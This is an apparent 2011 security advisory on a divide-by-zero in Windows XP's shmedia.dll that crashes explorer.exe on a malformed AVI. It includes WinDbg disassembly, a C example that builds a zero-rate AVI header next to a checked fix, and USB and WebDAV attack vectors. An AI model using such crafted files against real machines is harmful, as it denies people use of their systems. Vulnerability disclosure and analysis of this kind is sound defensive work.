SECURITYVULNS:DOC:26048 (vulners.com), Apr 04, 2011

Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS exploit
Title : Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS exploit
Version : Checked on Windows XP, all service packs
Discovery : http://Garage4Hackers.com, http://www.fb1h2s.com
Author : FB1H2S aka Rahul Sasi [ Garage4Hackers.com ]
Twitter : @fb1h2s

Bug Information:

Class : Division by zero
Impact : Crashes explorer.exe whenever a folder containing the file is viewed or listed in Windows Explorer.
Vendor : http://www.microsoft.com
Security Impact : Nil (an integer divide-by-zero exception; no memory corruption, no code execution)
DOS Impact : High
Remotely : Yes [a WebDAV share browsed in Explorer]
Locally : Yes
Crash File : Attached

Bug Details:

The shmedia.dll module is the Windows shell media extension: it supplies statistics and thumbnails for media files and acts as the shell's (explorer.exe) media property extractor, reading custom attribute information out of audio, video and MIDI files and video thumbnail files, including MPEG, MPE, MPG, ASF, ASX, AVI and WMV.

shmedia.dll calculates the file's bit rate and builds the preview shown in the Properties dialog. When a user opens a folder containing files with AVI or MPEG extensions, the copy of shmedia.dll loaded into explorer.exe automatically computes the file details and prepares the property preview.

A division-by-zero bug occurs when shmedia.dll handles a malformed AVI file: viewing or browsing the file crashes explorer.exe. No user action is required beyond moving the mouse pointer over the file, since the tooltip shown on hover already triggers property extraction. At present this is just a fun bug that causes a denial-of-service condition. The one practical consequence is that, because applications rely on the Windows common file dialog (File > Open) to browse for files, any application whose Open dialog lists a folder containing the file crashes as well.

Technical Details:
GetAviInfo is responsible for reading the file information. A preliminary check, _ValidAviHeaderInfo, verifies that the file carries the right AVI headers; only if it returns true does the function move on to the file-size and bit-rate calculation. The check is structural: a file whose headers are well formed but whose numeric fields are zero passes it.

###############################################################################
shmedia!GetAviInfo:
5cad6f8e 8bff mov edi,edi
5cad6f90 55 push ebp
5cad6f91 8bec mov ebp,esp
5cad6f93 53 push ebx
5cad6f94 56 push esi
5cad6f95 57 push edi
5cad6f96 ff7508 push dword ptr [ebp+8]
5cad6f99 bbffff0080 mov ebx,8000FFFFh
5cad6f9e e803f5ffff call shmedia!_ValidAviHeaderInfo (5cad64a6)
5cad6fa3 85c0 test eax,eax

If the header check passes, GetAviInfo opens the file with CreateFileW (GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING; the <Unloaded_hext.dll> symbols below are WinDbg mis-resolving the immediates 0x80 and 0xffff) and reads its size with GetFileSize, the inputs to the bit-rate calculation. On an open failure it converts GetLastError into an HRESULT (the and/or pair is HRESULT_FROM_WIN32) and returns; ebx was preset to 8000FFFFh (E_UNEXPECTED) for the header-check failure path:
##########################################################################################
5cad6fa5 7463 je shmedia!GetAviInfo+0x7c (5cad700a)
5cad6fa7 33ff xor edi,edi
5cad6fa9 57 push edi
5cad6faa 6880000000 push offset <Unloaded_hext.dll>+0x7f (00000080)
5cad6faf 6a03 push 3
5cad6fb1 57 push edi
5cad6fb2 6a01 push 1
5cad6fb4 6800000080 push 80000000h
5cad6fb9 ff7508 push dword ptr [ebp+8]
5cad6fbc ff154c10ad5c call dword ptr [shmedia!_imp__CreateFileW (5cad104c)]
5cad6fc2 8bf0 mov esi,eax
5cad6fc4 83feff cmp esi,0FFFFFFFFh
5cad6fc7 7518 jne shmedia!GetAviInfo+0x53 (5cad6fe1)
5cad6fc9 ff157810ad5c call dword ptr [shmedia!_imp__GetLastError (5cad1078)]
5cad6fcf 3bc7 cmp eax,edi
5cad6fd1 7437 je shmedia!GetAviInfo+0x7c (5cad700a)
5cad6fd3 7e37 jle shmedia!GetAviInfo+0x7e (5cad700c)
5cad6fd5 25ffff0000 and eax,offset <Unloaded_hext.dll>+0xfffe (0000ffff)
5cad6fda 0d00000780 or eax,80070000h
5cad6fdf eb2b jmp shmedia!GetAviInfo+0x7e (5cad700c)
5cad6fe1 57 push edi
5cad6fe2 56 push esi
5cad6fe3 ff15ac10ad5c call dword ptr [shmedia!_imp__GetFileSize (5cad10ac)]
5cad6fe9 56 push esi

Once the file size is determined, the function goes on to read the AVI data streams:
#########################################################################
5cad6ffb ff7508 push dword ptr [ebp+8]
5cad6ffe e8cffbffff call shmedia!ReadAviStreams (5cad6bd2)
-------------------> Our crash file contains zero-valued header fields here; ReadAviStreams reads them in and they end up as the divisor below.
5cad7003 8bd8 mov ebx,eax
5cad7005 e85c3e0000 call shmedia!AVIFileExit (5cadae66)
5cad700a 8bc3 mov eax,ebx
#########################################################################

The division by zero occurs in _aulldiv, the compiler's helper for unsigned 64-bit division (both operands are passed on the stack as 64-bit values). Its fast path first tests the high dword of the divisor ([esp+18h]); when that is zero it loads the low dword of the divisor ([esp+14h]) into ecx and the high dword of the dividend ([esp+10h]) into eax and executes a 32-bit div. The divisor is the zero-valued field read out of the file, so ecx is 0 and the div raises the integer divide-by-zero exception (STATUS_INTEGER_DIVIDE_BY_ZERO, 0xC0000094), which terminates explorer.exe.
#########################################################################################################
shmedia!_aulldiv:
5cadac40 53 push ebx
5cadac41 56 push esi
5cadac42 8b442418 mov eax,dword ptr [esp+18h]
-------------------> High dword of the divisor
5cadac46 0bc0 or eax,eax
5cadac48 7518 jne shmedia!_aulldiv+0x22 (5cadac62)
5cadac4a 8b4c2414 mov ecx,dword ptr [esp+14h]
-------------------> Low dword of the divisor: data from the stack that came from the file, zero
5cadac4e 8b442410 mov eax,dword ptr [esp+10h]
-------------------> High dword of the dividend
5cadac52 33d2 xor edx,edx
5cadac54 f7f1 div eax,ecx
-----------------------------> Division by zero error

eax=0000001e ebx=03cc0054 ecx=00000000 edx=00000000 esi=01c6eb64 edi=00000000
eip=5cadac54 esp=01c6e6e8 ebp=01c6eb08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
shmedia!_aulldiv+0x14:
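The computation the advisory traces, as an added example that is not shmedia.dll's code or the author's: a minimal RIFF/AVI header reader in C, with the bit-rate calculation written once as an unchecked 64-bit division (the form _aulldiv implements on x86) and once with the divisor checks that would have prevented the #DE. The AVI bytes are constructed here, not the attached crash file, and the assumption that the zero divisor is one of the strh dwScale/dwRate/dwLength fields is mine; the advisory does not name the field.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added example, not shmedia.dll's code. A minimal RIFF/AVI header reader and
 * the bit-rate calculation in unchecked and checked forms. Assumption: the zero
 * divisor comes from the first 'strh' chunk's dwRate/dwScale/dwLength fields
 * (the standard inputs to an AVI duration calculation); the advisory does not
 * name the field. */
typedef struct {
    uint32_t file_size;             /* RIFF payload size + 8 */
    uint32_t scale, rate, length;   /* strh.dwScale, dwRate, dwLength */
    int have_avih, have_strh;
} avi_info;

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Walk chunks in [off, end); every chunk is bounds-checked against its parent. */
static int walk(const uint8_t *buf, size_t off, size_t end, avi_info *out) {
    while (off + 8 <= end) {
        const uint8_t *ck = buf + off;
        uint32_t cksize = rd32(ck + 4);
        size_t payload = off + 8;
        if (cksize > end - payload) return -1;              /* chunk overruns parent */
        if (memcmp(ck, "LIST", 4) == 0) {
            if (cksize < 4 || walk(buf, payload + 4, payload + cksize, out) < 0) return -1;
        } else if (memcmp(ck, "avih", 4) == 0 && cksize >= 56) {
            out->have_avih = 1;
        } else if (memcmp(ck, "strh", 4) == 0 && cksize >= 56 && !out->have_strh) {
            out->scale  = rd32(ck + 8 + 20);                /* AVIStreamHeader offsets */
            out->rate   = rd32(ck + 8 + 24);
            out->length = rd32(ck + 8 + 32);
            out->have_strh = 1;
        }
        off = payload + cksize + (cksize & 1);               /* chunks are word-aligned */
    }
    return 0;
}

/* Structural validation in the spirit of _ValidAviHeaderInfo: RIFF/'AVI ' magic,
   sizes inside the buffer, avih and strh present. Zero-valued numeric fields
   pass this check, which is the advisory's point. */
int avi_parse(const uint8_t *buf, size_t len, avi_info *out) {
    memset(out, 0, sizeof *out);
    if (len < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "AVI ", 4)) return -1;
    uint32_t riff = rd32(buf + 4);
    if (riff < 4 || riff > len - 8) return -1;
    out->file_size = riff + 8;
    if (walk(buf, 12, 8 + riff, out) < 0) return -1;
    return (out->have_avih && out->have_strh) ? 0 : -1;
}

/* Unchecked form, the shape of the faulting computation: unsigned 64-bit
   divisions (what _aulldiv implements on x86) with file-controlled divisors.
   dwRate == 0, or a zero duration, raises #DE. Never call it on untrusted input. */
uint64_t avi_bitrate_unchecked(const avi_info *a) {
    uint64_t duration_ms = (uint64_t)a->length * a->scale * 1000 / a->rate;
    return (uint64_t)a->file_size * 8 * 1000 / duration_ms;
}

/* Checked form: refuse zero divisors and overflow before dividing. */
int avi_bitrate_checked(const avi_info *a, uint64_t *bps) {
    if (a->rate == 0 || a->scale == 0 || a->length == 0) return -1;
    uint64_t ticks = (uint64_t)a->length * a->scale;     /* 32x32 bits fits in 64 */
    if (ticks > UINT64_MAX / 1000) return -1;
    uint64_t duration_ms = ticks * 1000 / a->rate;
    if (duration_ms == 0) return -1;
    *bps = (uint64_t)a->file_size * 8 * 1000 / duration_ms;
    return 0;
}

static void put32(uint8_t **p, uint32_t v) { for (int i = 0; i < 4; i++) *(*p)++ = (uint8_t)(v >> (8 * i)); }
static void put4cc(uint8_t **p, const char *cc) { memcpy(*p, cc, 4); *p += 4; }

/* Constructed sample (not the advisory's crash file): a well-formed 164-byte AVI
   header with no frame data. rate=25 gives the good file, rate=0 the crafted one. */
size_t build_avi(uint8_t out[164], uint32_t rate) {
    uint8_t *p = out;
    put4cc(&p, "RIFF"); put32(&p, 156); put4cc(&p, "AVI ");
    put4cc(&p, "LIST"); put32(&p, 144); put4cc(&p, "hdrl");
    put4cc(&p, "avih"); put32(&p, 56);   /* 40000 us/frame, 300 frames, 1 stream, 320x240 */
    uint32_t avih[14] = { 40000, 0, 0, 0, 300, 0, 1, 0, 320, 240, 0, 0, 0, 0 };
    for (int i = 0; i < 14; i++) put32(&p, avih[i]);
    put4cc(&p, "LIST"); put32(&p, 68); put4cc(&p, "strl");
    put4cc(&p, "strh"); put32(&p, 56); put4cc(&p, "vids"); put4cc(&p, "DIB ");
    /* dwFlags, wPriority|wLanguage, dwInitialFrames, dwScale, dwRate, dwStart, dwLength, ..., rcFrame */
    uint32_t strh[12] = { 0, 0, 0, 1, rate, 0, 300, 0, 0, 0, 0, 0 };
    for (int i = 0; i < 12; i++) put32(&p, strh[i]);
    return (size_t)(p - out);
}

int main(void) {
    uint8_t f[164]; avi_info a; uint64_t bps;
    size_t n = build_avi(f, 25);
    if (avi_parse(f, n, &a) == 0 && avi_bitrate_checked(&a, &bps) == 0)
        printf("good file: %llu bit/s\n", (unsigned long long)bps);
    n = build_avi(f, 0);
    if (avi_parse(f, n, &a) == 0)      /* the crafted file still passes the structural check */
        printf("crafted file: checked calculation returns %d\n", avi_bitrate_checked(&a, &bps));
    return 0;
}
```

The crafted file is indistinguishable from a valid one to the structural check, exactly as _ValidAviHeaderInfo accepts the crash file; the only defence is to validate the arithmetic inputs at the point of use, which is what avi_bitrate_checked adds.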

Possible Attack Vector:

An attacker can copy a few of the crash files onto a USB drive and make the drive unusable: as soon as the user views its contents, explorer.exe crashes. Any folder Explorer renders behaves the same way, including a network or WebDAV share, which is the remote vector listed above.

Recommendations: Quick Fix

Until a patch is issued, unregister shmedia.dll. This needs an elevated command prompt and disables media thumbnails and property extraction in Explorer:

Regsvr32 /u shmedia.dll

Re-register it later with Regsvr32 shmedia.dll.

Rahul Sasi aka Fb1h2s
Info Security Consultant

www.fb1h2s.com
www.garage4hackers.com
www.garage4hackers.com/blog.php?8-Fb1h2s-blog
